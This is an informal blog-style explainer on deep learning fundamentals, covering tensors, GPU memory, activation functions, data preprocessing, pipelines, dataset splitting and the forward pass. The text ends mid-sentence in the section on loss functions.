[{"content":"Intro This is an attempt to cover what I know about DL to some degree. Some stuff is very skippable, and I don\u0026rsquo;t really remember everything that I put in here, so there might be some repeating, but not much.\nThe Foundations of Deep Learning To understand how machine learning models work, you have to completely discard the idea that it \u0026ldquo;understands\u0026rdquo; anything. A model does not read text or see images. At the absolute lowest level, a neural network is just a massively complex sequence of mathematical operations executed on silicon. To feed data into that silicon, we must first translate reality into a format that a GPU’s compute cores can process. That translation layer is the tensor.\n1. Data Structures The input, model weights, training gradients, and final predictions are stored as tensors.\nTo understand what a tensor is, it is easiest to walk up the chain of dimensionality:\nScalar (0D): A single number. In code, this is just a standard integer or float (e.g., 5 or 3.14). It has magnitude, but no dimensions. Vector (1D): An array of numbers. Think of this as a single column or a single row of data. In memory, it is a sequence of scalars sitting next to each other. Matrix (2D): A grid of numbers with rows and columns. If you have ever used a spreadsheet, you were looking at a 2D matrix. Tensor (ND): A generalized, $n$-dimensional container for numerical data. Technically, scalars, vectors, and matrices are just 0D, 1D, and 2D tensors. However, in deep learning, the term \u0026ldquo;tensor\u0026rdquo; is used to refer to data with 3, 4, or 5+ dimensions. Memory Layout and Shapes The computer\u0026rsquo;s RAM and your GPU\u0026rsquo;s VRAM do not have three dimensions. Memory is strictly one-dimensional—it is a single, massively long line of physical addresses.\nSo, how does a GPU store a 3D or 4D tensor in a 1D memory space? It uses contiguous memory and a concept called strides.\nWhen a tensor is loaded into vRAM, the hardware lays out all the numbers in one flat, contiguous array. The \u0026ldquo;shape\u0026rdquo; of the tensor (e.g., telling the system it is a 3x3x3 grid) is actually just a tiny piece of metadata. This metadata specifies the strides, or the exact number of bytes, that the memory controller needs to skip forward in that 1D physical line to logically reach the \u0026ldquo;next\u0026rdquo; row or the \u0026ldquo;next\u0026rdquo; depth layer.\nThis physical reality dictates how we build and optimize models:\nCache Locality: Reading data linearly down the 1D memory line is blindingly fast because the CPU/GPU pulls in whole blocks of adjacent memory into its L1/L2 cache at once. If your math operations force the hardware to constantly jump around the 1D line (poor memory access patterns), your incredibly fast GPU will stall while waiting for data. Reshaping: In deep learning frameworks like TensorFlow or PyTorch, calling a .reshape() operation is usually instantaneous, because the framework doesn\u0026rsquo;t actually move any of the data in VRAM. It simply recalculates the stride metadata and leaves the 1D physical memory unchanged. Tensors in Practice If you want to train a Convolutional Neural Network (CNN) to recognize dogs, you don\u0026rsquo;t feed it one image at a time. To keep the GPU\u0026rsquo;s thousands of cores fully saturated, you feed it a \u0026ldquo;batch\u0026rdquo; of images simultaneously.\nThe standard tensor shape for an image batch in deep learning is Batch Size, Height, Width, and Color Channels.\nBatch Size: You are processing 32 images at once. Height: Each image is 256 pixels tall. Width: Each image is 256 pixels wide. Color Channels: Using RGB encoding, you need 3 color values to represent a color. So, the input tensor has the shape [32, 256, 256, 3]\nThe tensor\u0026rsquo;s shape determines how much memory is used. The tensor used as an example contains 6,291,456 individual numbers. If you are using standard 32-bit floating-point precision, this single input tensor takes up roughly 25 Megabytes of contiguous physical vRAM before the model has even done a single mathematical operation.\n2. The Hardware Engine Running inference on a model requires enough vRAM to hold the model weights and the context. Training a model is vastly more demanding because the hardware must maintain the state of the entire learning process.\nTraining Memory Cost During inference, data passes through the neural network, generates an output, and the intermediate calculations are discarded. During training, discarding that data is impossible. Training requires storing four separate components in vRAM simultaneously:\nModel Weights: The actual parameters of the neural network. Activations: The output of every single hidden layer during the forward pass. These must be kept in vRAM because the backpropagation algorithm needs them to calculate the gradients later. Gradients: The calculated error values for every single parameter, telling the model how to adjust. Optimizer States: Modern optimizers like Adam do not just update weights blindly. Adam keeps track of the momentum (moving average of the gradient) and variance (moving average of the squared gradient) for every single parameter. This means a model that requires 4GB of VRAM to run might easily require 16GB to 24GB to train.\nCompute The core operation of a neural network is the Matrix Multiply-Accumulate (MMA). The hardware must multiply an input by a weight and add a bias. Modern GPUs handle this using specialized hardware called Tensor Cores, which can execute a 4x4 matrix MMA operation in a single clock cycle, as discussed in the AI Stack post.\nTo maximize the speed of these Tensor Cores and reduce the memory bandwidth bottleneck, training utilizes Mixed Precision.\nStandard precision uses 32-bit floating-point numbers (FP32). Mixed precision drops the compute operations down to 16-bit (FP16 or BF16). This halves the vRAM requirement for activations and doubles the memory bandwidth, allowing the Tensor Cores to process data twice as fast.\nHowever, gradients (the weight updates) are often extremely small numbers. If you apply a tiny update, like 0.0000001, to an FP16 number, the hardware lacks the precision to represent it, and it rounds to zero. This is called numerical underflow. To prevent this, mixed-precision training keeps a \u0026ldquo;master copy\u0026rdquo; of all weights in FP32. The hardware calculates the gradients quickly in 16-bit, casts them up to 32-bit to safely update the master weights, and then casts the updated weights back down to 16-bit for the next pass.\nThe CPU and PCIe/memory Bottleneck The GPU is the compute engine, but the CPU acts as the fuel pump. If the pipeline feeding the GPU breaks down, the GPU sits idle.\nBefore a GPU can perform a single matrix multiplication, the CPU must:\nFetch the raw data from the SSD or NVMe drive. Decode the data (e.g., converting compressed JPEG files into raw pixel arrays). Apply any preprocessing or data augmentation. Bundle the data into the correct tensor shapes. Push that batch of tensors across the motherboard\u0026rsquo;s PCIe lanes and into the GPU\u0026rsquo;s VRAM. If your CPU is too slow to decode the data, or you do not have enough PCIe bandwidth, the GPU will process a batch of data in 10 milliseconds and then spend 50 milliseconds doing absolutely nothing while waiting for the next batch to arrive. This is called GPU starvation. When building a deep learning setup, the speed of the storage, the number of CPU cores handling the data pipeline, and the memory bandwidth dictate the actual training speed just as much as the GPU itself.\n3. The Anatomy of a Neural Network If the tensor is the data format and the GPU is the engine, the neural network architecture is the physical wiring. At its absolute core, a neural network is just a mechanism for finding patterns in numbers, and it does this through a staggering volume of very simple arithmetic.\nThe Artificial Neuron (Perceptron) To understand a multi-billion parameter model, you have to look at the smallest functional unit: the artificial neuron. When a GPU processes data through a neuron, it is executing a single, foundational mathematical equation: $y = f(\\mathbf{w} \\cdot \\mathbf{x} + b)$\n$\\mathbf{x}$: The inputs. This is a vector of numbers, either coming from your raw data (e.g., pixel values) or from the previous layer of the network. $\\mathbf{w}$: The weights. This is a vector of parameters the model actually learns. Each weight acts as a volume knob, determining how much \u0026ldquo;importance\u0026rdquo; to assign to its corresponding input. $\\mathbf{w} \\cdot \\mathbf{x}$: The dot product. The GPU multiplies each input by its corresponding weight and sums them together to produce a single number. This is the Matrix Multiply-Accumulate (MMA) operation discussed in the hardware section. $b$: The bias. After the dot product is calculated, a single scalar value is added to the result. Why the Bias Exists Bias fixes the issue of the neuron\u0026rsquo;s output being strictly tied to the input. If all inputs in $\\mathbf{x}$ are 0, the output must be 0, effectively anchoring the logic to the origin point of a graph. Bias allows the network to shift the activation threshold left or right, independently of the input data, giving the model the flexibility to fit patterns that do not pass through zero.\nNOTE: There is more to bias, but not that important, so I removed it\nFrom Neurons to Layers A single neuron is useless for complex tasks. To build a network, we stack hundreds or thousands of these neurons side-by-side to create a layer.\nWhen we do this, the math naturally scales from vector operations to matrix operations. Instead of calculating a dot product for a single neuron, the GPU takes an entire matrix of inputs and multiplies it by an entire matrix of weights for the entire layer simultaneously. This is why AI requires GPUs: a CPU would calculate these neurons sequentially, while a GPU’s specialized cores calculate the entire matrix multiplication across the entire layer in a single clock cycle.\nArchitecture When you string these layers together, you get the standard deep learning architecture:\nInput Layer: Not actually a layer of computing neurons. It is just the raw tensor format of your incoming data. Hidden Layers: The core of the network. They are \u0026ldquo;hidden\u0026rdquo; because you do not dictate what these layers learn. You feed data in one end and check the prediction at the other. The network automatically configures the weights in these intermediate layers to represent features (e.g., the first hidden layer learns to find edges, the second learns shapes, the third learns faces). Output Layer: The final set of neurons that maps the high-level feature representations back down to the specific prediction format you want (e.g., a single probability score for a binary classification). 4. Activation Functions: Forcing Non-Linearity In the neuron equation $y = f(\\mathbf{w} \\cdot \\mathbf{x} + b)$ the math inside the function has been covered; it\u0026rsquo;s matrix multiplication, but the function that gets passed that data is variable.\nLinear The dot product and bias addition are strictly linear operations. Here is a fundamental mathematical reality: a linear combination of linear functions is just another linear function.\nIf you stack 100 hidden layers together, but only use the math $\\mathbf{w} \\cdot \\mathbf{x} + b$ those 100 layers collapse, and the result is identical to a single layer. A purely linear network can only draw a straight line through data. To learn complex, curving, real-world patterns, we have to bend the math. We must inject nonlinearity into the system so that a layer\u0026rsquo;s output is not just a scaled version of its input.\nReLU (Rectified Linear Unit) ReLU is one of the most commonly used activation functions for hidden layers. The equation is incredibly simple: $$f(x) = \\max(0, x)$$ NOTE: If the input is positive, it passes through unchanged. If it is negative, it becomes zero.\nWhy is this so popular? Hardware efficiency. To compute complex curves such as exponentials or sines, the GPU has to spend multiple clock cycles. To compute ReLU, the GPU simply checks the sign bit of the floating-point number in memory. If the sign bit indicates a negative, it zeros it out. It is computationally nearly free. By simply clipping all negative values to zero, ReLU provides sufficient non-linearity for the network to map highly complex boundaries without slowing the training loop.\nSigmoid and Tanh Before ReLU, networks relied on functions like Sigmoid and Tanh. Sigmoid maps any input to a value between 0 and 1: $$f(x) = \\frac{1}{1 + e^{-x}}$$Tanh is mathematically similar but maps inputs to a range between -1 and 1. $$\\tanh(x) = \\frac{e^x - e^{-x}}{e^x + e^{-x}}$$These functions are fantastic for output layers. If you are building a model to predict whether an image is a dog or a cat, putting a Sigmoid function on the final neuron guarantees the output will be a clean probability score (e.g., 0.85, or 85% dog).\nHowever, they are terrible for hidden layers in deep networks because of a hardware and calculus issue called the vanishing gradient problem. Look at the math for Sigmoid: if you feed it a large positive number (like 10) or a large negative number (like -10), the output flatlines at 1 or 0. The curve becomes completely horizontal. When the backpropagation algorithm tries to calculate the gradient (the slope) on a horizontal line, the gradient is effectively zero. If the gradient is zero, the optimizer cannot update the weights, and the network permanently stops learning.\nThe Data Engine If you feed a highly optimized, mixed-precision GPU pipeline with garbage data, it will just learn to predict garbage with incredible efficiency. The mathematical mechanics of deep learning are completely blind; they will optimize for whatever patterns exist in the dataset, including corrupted files and systemic biases (all the fun stuff).\n1. Data Acquisition: Sourcing the Raw Fuel Before a tensor can be loaded into VRAM, the numbers have to come from somewhere. Sourcing data for deep learning is a difficult task due to how much is needed and most data at that scale is not clean or in the format that is needed for the training process.\nPublic Datasets A command like load_dataset(\u0026quot;mnist\u0026quot;) from a public repository like Kaggle, the UCI Machine Learning Repository, or HuggingFace, you instantly receive perfectly aligned, mathematically normalized matrices ready for training. This is nice if you are building a model related to those datasets. Public datasets represent solved data entropy problems. They have already been aggressively filtered, balanced, and cleaned. Relying exclusively on pre-packaged CSVs or NumPy arrays skips the hardest physical and logical barrier in building a model: forcing unstructured, real-world data into a structured tensor.\nScraping and APIs The raw fuel for custom models—whether predicting market trends or classifying niche industrial components—must be extracted from the wild. This means pulling data via REST APIs or scraping raw HTML. Long before backpropagation or loss functions enter the equation, the data ingestion pipeline must handle severe infrastructural hurdles:\nRate Limits and Backoff: You cannot pull a million JSON records simultaneously without hitting HTTP 429 (Too Many Requests) errors. Acquisition scripts require exponential backoff logic to trickle data onto local storage without overloading the host server or getting the requesting IP banned. Pagination and State: When extracting large datasets over unstable network connections, scripts can crash. If a connection drops on page 50,000 of an API response, the pipeline needs state management to know exactly where it left off, preventing duplicate data ingestion or massive gaps in the dataset. Schema Mutations: The JSON schema received on day one of an extraction might not match the schema on day five. Fields disappear, data types silently change from integers to strings, and nested arrays get corrupted. The ingestion pipeline must catch these mutations, flatten nested JSON or HTML DOM trees, and serialize them into a unified, predictable format on disk before mathematical preprocessing can even begin.\nSynthetic Data Generation When enough raw data can\u0026rsquo;t be scraped, or when specific edge cases are too rare in the wild, the modern approach is synthetic data. This involves using a large, powerful model to generate training data for a smaller, specialized architecture.\nFor example, a 70B parameter Large Language Model (LLM) might generate thousands of highly complex, correctly formatted SQL queries to train a tiny 3B parameter model to do nothing but write SQL. In computer vision, a diffusion model might generate thousands of images of defective factory parts to train a standard Convolutional Neural Network (CNN) to detect those specific anomalies on an assembly line.\nHowever, relying on synthetic data introduces a fatal mathematical risk known as Model Collapse.\nModel Collapse Neural networks are probabilistic engines. They are trained to map the distribution of their training data, and when they generate output, they inherently favor the most probable patterns (the center of the bell curve) while occasionally missing the rare edge cases (the tails of the distribution).\nModel collapse is a degenerative process where iterative training on self-generated data leads to a gradual decline in performance.\nIterative Collapse: If Model B is trained entirely on data generated by Model A, Model B only learns the high-probability patterns that Model A produced. The variance in the data shrinks. If Model B is then used to generate data to train Model C, the variance shrinks again. Mathematically, the original, messy diversity of the true data distribution is gradually erased, and the test error accumulates infinitely over each generation ($n$) according to the equation $E_{test} = \\frac{\\sigma^{2}d}{T-d-1} \\times n$. Within a few generations, the probability distribution collapses into a narrow spike. The model forgets how to handle edge cases, its outputs become highly repetitive, and its generalization capabilities are permanently degraded. Non-Iterative Collapse: You cannot bypass this simply by mixing pure synthetic data with human data during a fresh pre-training run. There is a direct, negative correlation between the proportion of pure synthetic data in your pipeline and the final performance of the model. When training from scratch, purely synthetic data does not benefit the model and physically hinders its learning process. Diagnosing the Failure: Why Synthetic Data Fails When we inspect the raw tensors, pure synthetic data fails for two strict mathematical reasons:\nCoverage Narrowing (Killing the Long Tail): Human data is chaotic; it possesses a sharp peak and a massive \u0026ldquo;long tail\u0026rdquo; of highly diverse, rare structural features. Synthetic data completely amputates this tail. Language models default to generating \u0026ldquo;safe,\u0026rdquo; highly probable text. When measured, synthetic data is violently compressed into a narrow fraction of the true distribution, exhibiting a perplexity range confined to [0, 14], compared to the human data range spanning from 0 to over 100. The GPU never sees the mathematical edge cases required to generalize. Feature Over-Concentration: Because synthetic data plays it safe, it severely overuses specific n-gram features. If you hash the bi-grams of synthetic text, you will find massive, unnatural spikes in specific word combinations compared to the broad, scattered response of human text. Semi-Synthetic Data To safely scale your datasets without triggering model collapse, you must abandon generating pure synthetic data from scratch. Instead, you must use real human data as an anchor to preserve the primary human-produced data distribution, and apply Token-Level Editing to create \u0026ldquo;semi-synthetic\u0026rdquo; data.\nHere is the mechanical execution:\nThe Prior Inference: You pass a real human sentence through a frozen, pre-trained language model (the prior). Targeting the U-Shape: You ask the prior to calculate the conditional probability of every single token in the sequence. Surgical Resampling: If a token\u0026rsquo;s predicted probability is incredibly high (exceeding a strict threshold, like $p \\ge 0.99$), it means the token is mathematically \u0026ldquo;easy\u0026rdquo; and offers almost zero learning value to the optimizer. You instruct the script to violently drop that original token and resample a new one from the distribution. If the token is mathematically complex (low-probability), leave it completely untouched. By only rewriting the highly predictable tokens and leaving the complex structures intact, you inject fresh variability into the dataset while physically preserving the human long-tail manifold. Most importantly, this semi-synthetic editing mathematically bounds the test error to a finite limit ($E_{test} \\le \\frac{2\\sigma^{2}d}{T-d-1}$), completely halting the infinite error accumulation and preventing model collapse.\nNOTE: This applies to more then just human language but also to any other form of data. By implementing this change on the data, you are able to get more out of the data you have.\n2. Preprocessing Raw data is rarely ready to be computed. A neural network is a strict mathematical engine; it does not possess the common sense to ignore a blank cell or understand that a sensor glitched and recorded an impossible value. If you load raw, uncleaned data into VRAM, the math will execute exactly as instructed, which usually results in the immediate destruction of the model\u0026rsquo;s weights.\nThe Danger of Missing Values In a standard spreadsheet, a missing value is just an empty box. In a database, it is a NULL. But when data is serialized into a tensor for a GPU, missing values are cast as NaN (Not a Number) according to the IEEE 754 floating-point standard.\nThis introduces a catastrophic mathematical virus into your hardware known as NaN poisoning. The core rule of floating-point math is that any operation involving a NaN evaluates to NaN.\n$5 + \\text{NaN} = \\text{NaN}$ $\\text{NaN} \\times 0 = \\text{NaN}$ If a single NaN value slips into a batch of 10,000 inputs, here is the exact physical chain reaction that occurs during that training step:\nForward Pass: The NaN input is multiplied by the weights in the first hidden layer. Those specific activations become NaN. In the next layer, those NaN activations are multiplied by additional weights, spreading the NaN across the entire layer. By the time the data reaches the output layer, the final prediction is NaN. Loss Calculation: The inference engine compares the NaN prediction to the true label. The resulting error (loss) is calculated as NaN. Backpropagation: The calculus engine attempts to find the gradient of NaN. The resulting gradients for every single parameter in the network become NaN Optimizer Update: The optimizer takes the current, healthy model weights and adds the NaN gradients to them. In a fraction of a second, the entire multibillion-parameter weight matrix is overwritten with NaNs. The model is irreversibly destroyed, and training must be completely restarted from the last saved checkpoint.\nThis is very bad. It has happened on several occasions\nImputation Strategies To prevent NaN poisoning, missing values must be aggressively scrubbed before tensor conversion. If a row has too many missing values, dropping it entirely is the safest option. But if you cannot afford to lose the data, you must perform imputation—mathematically guessing the missing number.\nMean/Median Imputation: The fastest hardware approach. You calculate the average or the middle value of that specific feature across the dataset and plug it into the blank spaces. While computationally cheap, this is mathematically dangerous. It artificially reduces the variance of your dataset and creates a massive, unnatural spike in your data distribution directly at the mean, which the neural network will inevitably overfit to. Predictive Imputation: A much safer, though computationally expensive, route. Instead of using a blind average, you use a smaller algorithm (like K-Nearest Neighbors) to analyze the other features in that specific row and predict what the missing value likely was. This preserves the dataset\u0026rsquo;s statistical relationships and variance, keeping the data distribution natural for the final model. Outliers and Heavy Tails Neural networks learn by making mistakes and calculating the error (the gradient). That gradient dictates how aggressively the optimizer updates the weights.\nImagine a dataset of house prices with a normal range of $100,000 to $500,000. Due to a scraping error, one house is listed at $999,000,000.\nDuring the forward pass, the model predicts $300,000. The loss function (usually Mean Squared Error for regression) computes the squared difference between the prediction and the anomaly. The resulting error signal is massive.\nWhen backpropagation calculates the gradient from this massive error, the resulting weight update is so violent that it completely overwrites the fine-tuned adjustments the model made over the last hundred batches. The optimizer gets thrown completely out of the local minimum it was settling into. Extreme anomalies ruin gradient descent.\nTo fix this, the data must be capped or clipped (a process sometimes called Winsorization). Before the data ever hits the GPU, a script analyzes the distribution and establishes hard ceilings and floors, for example, at the 1st and 99th percentiles. Any value above the 99th percentile is simply rewritten to exactly match the 99th percentile value. This ensures that, while the model still sees a \u0026ldquo;high\u0026rdquo; value, the resulting gradient is physically constrained from producing a catastrophic error signal that could destroy the optimizer\u0026rsquo;s progress.\n3. Feature Scaling If you do not scale your data, you are actively fighting the mathematics of optimization. Neural networks are entirely blind to the physical units of your dataset. They only see raw magnitude. The topography of the loss landscape, the mathematical terrain the optimizer must navigate to find the lowest error, is entirely dictated by the scale of your features.\nThe Problem of Uneven Features Consider a dataset with two inputs: Feature A (number of rooms), ranging from 1 to 5, and Feature B (house price), ranging from $100,000 to $1,000,000.\nDuring the forward pass ($\\mathbf{w} \\cdot \\mathbf{x}$), the massive raw values of Feature B will output huge numbers. Because the numbers are so large, even a microscopic adjustment to the weight of Feature B will cause a massive swing in the final loss calculation. Conversely, changing the weight of Feature A will barely register.\nWhen the backpropagation algorithm computes the gradients, those for Feature B will completely dominate. The loss landscape physically distorts from a clean, symmetrical bowl into an elongated, narrow ravine.\nWhen the optimizer attempts to descend this ravine, it bounces erratically against the steep walls created by Feature B, struggling to make any forward progress along the shallow axis of Feature A. To prevent the model from exploding out of the ravine entirely, you are forced to set an incredibly small learning rate, meaning the network will take an eternity to train.\nNormalization Normalization (specifically Min-Max Scaling) fixes this distortion by compressing the raw data into a strict 0 to 1 range.\nThe math is a straightforward linear transformation: $x_{norm} = \\frac{x - x_{min}}{x_{max} - x_{min}}$\nThe hardware takes the data point, subtracts the absolute minimum value in the dataset, and divides it by the total range. This forces the lowest value to perfectly equal 0, and the highest value to perfectly equal 1.\nThis technique is essential when the physical boundaries of the data are strictly known and fixed. The classic use case is computer vision. A standard 8-bit image pixel strictly ranges from 0 to 255. By dividing the entire image tensor by 255, you mathematically perfectly normalize the data to a 0 to 1 range, instantly stabilizing the dot products in the first layer of your Convolutional Neural Network without losing any spatial relationships.\nStandardization Standardization (or Z-Score scaling) takes a different mathematical approach. Instead of forcing data into a hard box, it centers the data around a mean of 0 with a standard deviation of 1.\nThe math: $z = \\frac{x - \\mu}{\\sigma}$\nThe hardware subtracts the feature\u0026rsquo;s mean ($\\mu$) from the data point, and divides it by the feature\u0026rsquo;s standard deviation ($\\sigma$).\nStandardization is generally preferred over Min-Max scaling for deep learning for two core reasons. First, it is highly resilient to anomalies. If Min-Max scaling encounters a single massive outlier, $x_{max}$ becomes huge, and the rest of your normal data gets crushed into a tiny fraction of the 0 to 1 range. Standardization does not have a hard ceiling, so an outlier remains an outlier without destroying the distribution of the healthy data.\nSecond, it centers the data exactly at zero.\nWhen input tensors hover symmetrically around zero, the initial dot products in the hidden layers also hover around zero. This keeps the network\u0026rsquo;s values safely within the optimal, non-saturated operating ranges of activation functions, preventing gradients from vanishing or exploding early in the training loop.\n4. Modality-Specific Formatting A GPU cannot ingest a file from your hard drive. It can only execute matrix multiplication on raw numbers. Before any training can begin, the physical files representing your data must be mechanically translated into the strict mathematical tensor format the hardware expects.\nVision (Images) An image on disk is not a matrix of numbers; it is a highly compressed byte stream.\nDecoding Formats: When you load a JPEG or PNG, the CPU must first decompress the file. A JPEG relies on the Discrete Cosine Transform (DCT) to compress data. The CPU must execute an inverse DCT to reconstruct the data into a raw, uncompressed 3D array of red, green, and blue (RGB) pixel intensities ranging from 0 to 255. Resizing and Interpolation: Neural network architectures require strict, fixed input shapes. If your first Convolutional layer expects a [256, 256, 3] tensor, but your decoded image is [1920, 1080, 3], the CPU must physically shrink the array. This is not accomplished by simply dropping pixels, which would destroy spatial relationships. Instead, it uses interpolation math. Bilinear interpolation, for example, looks at the four nearest known pixels in the original high-resolution grid, calculates their weighted average based on physical distance, and uses that resulting fraction to synthesize a completely new pixel for the smaller 256x256 grid. Data Augmentation: Deep learning models are incredibly prone to memorization. A GPU can memorize the exact pixel values of 10,000 images in minutes (overfitting). The cheapest, most effective way to prevent this is data augmentation: mathematically mutating the tensors on the CPU before they are sent across the PCIe bus to the GPU. Rotating: Multiplying the image tensor by a 2D rotation matrix. Flipping: Reversing the index order of the array along the X or Y axis. Cropping: Slicing a random [224, 224, 3] subset tensor out of the larger [256, 256, 3] tensor. By applying these random mathematical transformations to every batch, the GPU never sees the exact same numerical grid twice. It is physically forced to learn the underlying shapes and edges rather than memorize static pixel values.\nText (Tokenization Basics) GPUs do not understand strings. A word is just a sequence of ASCII or UTF-8 characters, which are useless for neural network arithmetic. To process text, the strings must be mapped to a fixed vocabulary of integers.\nBridging the Gap: Tokenization is the process of chopping a string into smaller chunks and assigning each chunk a unique integer ID. If you map at the word level, your vocabulary becomes impossibly large (millions of IDs), causing memory bloat. If you map at the character level, the model loses the semantic meaning of the words. Byte Pair Encoding (BPE): The modern standard is sub-word tokenization. Algorithms like BPE scan the entire training corpus to identify the most mathematically frequent byte sequences. Common words like \u0026ldquo;the\u0026rdquo; get a single ID. Less common words get broken down into highly frequent sub-components. For example, the word \u0026ldquo;highest\u0026rdquo; might be split into the root \u0026ldquo;high\u0026rdquo; (ID: 402) and the suffix \u0026ldquo;est\u0026rdquo; (ID: 88). The Final Tensor: After the tokenizer runs, a sentence is entirely stripped of text. \u0026ldquo;Deep learning is fast\u0026rdquo; becomes a simple 1D tensor of integers: [8452, 312, 64, 1102]. These integers are then used by the hardware as direct lookup indices to pull the corresponding dense weight vectors from the model\u0026rsquo;s embedding matrix. Model takes input. Converts to a language it understands and can run on a GPU. That is the takeaway here.\n5. The Data Pipeline As established in the hardware breakdown, the GPU is a mathematically ravenous engine, and the CPU is the fuel pump. If the pipeline feeding the GPU fails, the GPU\u0026rsquo;s massive compute capability is entirely wasted. Building a deep learning data pipeline is an exercise in managing physical bottlenecks.\nThe Impossibility of RAM In standard software development, you typically load a file into memory, process it, and output a result. In deep learning, doing this will instantly crash your machine.\nModern datasets are massive. A modest image dataset or a large text corpus can easily exceed 500GB. Standard system RAM typically caps out between 64GB and 256GB. If you attempt to load the entire dataset into memory at the start of your script, the operating system will immediately exhaust physical RAM and begin paging data to the hard drive\u0026rsquo;s swap file. This brings the entire system to a grinding halt before throwing an Out of Memory (OOM) kill signal. The data must be physically managed.\nLazy Loading and Memory Mapping The solution to the RAM bottleneck is lazy loading. Instead of reading the files, the script merely loads a lightweight list of file paths or byte offsets into RAM. The CPU only reads the specific physical data required for the exact batch it is about to process.\nTo do this efficiently, the pipeline relies on memory mapping. This is an operating system-level trick that maps a file on the NVMe SSD directly to the application\u0026rsquo;s virtual address space. Instead of using slow, standard file I/O operations to copy data from disk into a RAM buffer, the OS pages raw chunks of the file into RAM only when the CPU requests those specific addresses. This minimizes overhead and keeps the memory footprint strictly limited to the current batch size.\nAsynchronous Prefetching Even with lazy loading, a naive pipeline will cause severe hardware starvation.\nIn a synchronous loop, the execution looks like this:\nThe CPU fetches the batch $N$ from the SSD. The CPU decodes and augments the data. The CPU pushes the tensor across the PCIe bus. The GPU executes the Matrix Multiplications for Batch $N$. The system waits for the GPU to finish. The CPU finally begins fetching the batch $N+1$. During steps 1, 2, and 3, the GPU is doing absolutely nothing. If you look at your hardware monitor, your GPU utilization will look like an erratic heartbeat spiking to 100% for a fraction of a second, then crashing to 0% while it waits for the CPU to prepare the next batch.\nTo achieve a flatline of 100% GPU utilization, the pipeline must be asynchronous. You must instruct the framework to spin up background CPU threads. While the GPU is actively crushing the Matrix Multiplications for the batch $N$, the CPU is simultaneously fetching, decoding, and augmenting the Batch $N+1$.\nThe CPU then places this prepared batch into pinned memory (page-locked RAM). Pinned memory allows the GPU to use Direct Memory Access (DMA) to pull the data directly across the PCIe lanes without the CPU having to actively manage the transfer. The exact microsecond the GPU finishes calculating the gradients for the batch $N$, Batch $N+1$ instantly floods into VRAM. The GPU never waits, the Tensor Cores never idle, and the hardware is pushed to its absolute physical limit.\n6. Dataset Splitting: The Scientific Method A neural network is, at its core, a high-capacity memorization engine. If it is evaluated on the exact same matrices it used to calculate its gradients, it will report near-perfect accuracy simply because it mapped the precise topography of those specific data points. To scientifically prove that the mathematical mapping actually generalizes to unseen reality, the raw data must be physically quarantined into three distinct silos before any preprocessing begins.\nThe Training Set (80%): The only data that physically alters the model. This data is pushed through the forward pass, generates the error signal, and drives the backpropagation algorithm to update the weights. The Validation Set (10%): The tuning gauge. At the end of every training epoch, this data is passed through the network with backpropagation strictly disabled. It generates a validation loss metric. This metric dictates when to adjust hyperparameters or when to halt the training loop entirely (Early Stopping), because the model has stopped learning general patterns and has started memorizing the training set. The Test Set (10%): This data is entirely stripped from the pipeline and held on disk until the training and tuning processes are 100% complete. It is run through the static, finalized weights exactly once. The resulting metric is the only mathematically valid representation of how the model will perform in the wild. NOTE: In deep learning, where datasets often contain tens of millions of records, these percentages often shift to 98% / 1% / 1%, since a 1% slice of a 500GB dataset is still statistically significant enough to validate against.\nData Leakage The quarantine of the validation and test sets must be absolute. If mathematical information from the test set bleeds into the training set, the integrity of the entire training run is destroyed. This is called data leakage. It guarantees that a model will output phenomenal metrics during testing, but catastrophically fail the moment it is deployed. At least it might.\nThe most common vector for data leakage occurs during preprocessing, specifically feature scaling.\nIf a dataset requires Standardization ($z = \\frac{x - \\mu}{\\sigma}$), the mean ($\\mu$) and standard deviation ($\\sigma$) must be calculated. Calculating the mean and standard deviation across the entire raw dataset before executing the physical train/test split is one way this can occur.\nIf this happens, the extreme outliers and the statistical distribution of the test set are permanently baked into the $\\mu$ and $\\sigma$ variables. When those variables are used to scale the training tensors, the training data is mathematically influenced by the test data. The model implicitly \u0026ldquo;sees\u0026rdquo; the future. The optimizer learns the topography of the test set without ever formally processing it.\nTo maintain mathematical integrity, the physical split must happen first. The mean and standard deviation are calculated exclusively from the isolated training subset. Those exact, static training variables are then saved to the disk and applied to scale the validation set, the test set, and eventually, the live production data.\nUnder the Hood The data pipeline has done its job. A perfectly formatted, mathematically scaled batch of tensors is now sitting in the GPU’s pinned memory. The hardware is ready. Now, we execute the mathematical operations that actually force a model to learn.\n1. The Forward Pass: Execution and State The forward pass is the physical execution of data moving through the network\u0026rsquo;s architecture to generate a prediction. It is a strictly sequential, highly parallelized chain of linear algebra.\nThe Matrix Cascade When a batch of data enters the first hidden layer, the GPU\u0026rsquo;s Tensor Cores spin up to execute a massive Matrix Multiply-Accumulate (MMA) operation. The hardware takes the entire input tensor ($X$) and calculates the dot product against the layer\u0026rsquo;s entire weight matrix ($W$), followed immediately by the addition of the bias vector ($b$).\nThe raw mathematical output of this layer is: $Z = X \\cdot W + b$\nHowever, as established, this raw output $Z$ is purely linear. Before this data can move to the next layer, it must be passed through a non-linear activation function like ReLU. The GPU processes the $Z$ tensor, snapping all negative numbers to zero: $A = \\max(0, Z)$\nThis resulting tensor, $A$, is called the activation. This activation tensor immediately becomes the input $X$ for the next hidden layer, triggering the next MMA operation.\nThis creates a cascade. The tensors flow from layer to layer, undergoing continuous mathematical transformations: multiply, add, snap to zero, repeat until the final layer compresses the data down into a single prediction tensor.\nCaching the Activations If we were only running inference (just asking the model for a prediction), the GPU would ruthlessly delete each layer\u0026rsquo;s activation tensor from VRAM the exact millisecond the next layer finished computing. Memory is cleared instantly to make room for the next batch.\nDuring training, doing this breaks the laws of calculus or at least the ability to use the equations for backpropagation.\nAs the GPU calculates the output of every single hidden layer, it must actively cache those intermediate $A$ and $Z$ tensors in VRAM. The forward pass is not just about getting the final prediction; it is about building the mathematical state required for learning.\nWhen we eventually reach the backpropagation phase, the network will need to compute the gradient (the error) of each weight. According to the chain rule of calculus, you cannot calculate the partial derivative of a weight without knowing the exact input value that was multiplied against it. If the GPU drops those intermediate activations to save memory, the backward pass cannot be computed, and the network cannot learn.\nThis is the exact reason why training a model requires more VRAM than running one exponentially. The forward pass leaves a massive, uncompressed trail of cached matrices that consume gigabytes of memory, sitting idle and waiting for the backward pass to use them.\n2. Loss Functions The forward pass terminates by outputting a final prediction tensor. At this exact moment, the network has no concept of whether it succeeded or failed. The GPU simply holds a matrix of floating-point numbers. To force the network to learn, we must introduce a strictly mathematical way to quantify how badly that prediction deviated from the true label.\nThis calculation is the loss function. It compresses the entire network\u0026rsquo;s performance for that specific batch into a single scalar value.\nMean Squared Error (MSE) for Regression When building a model to predict continuous numerical values, such as the price of a house or the temperature of a 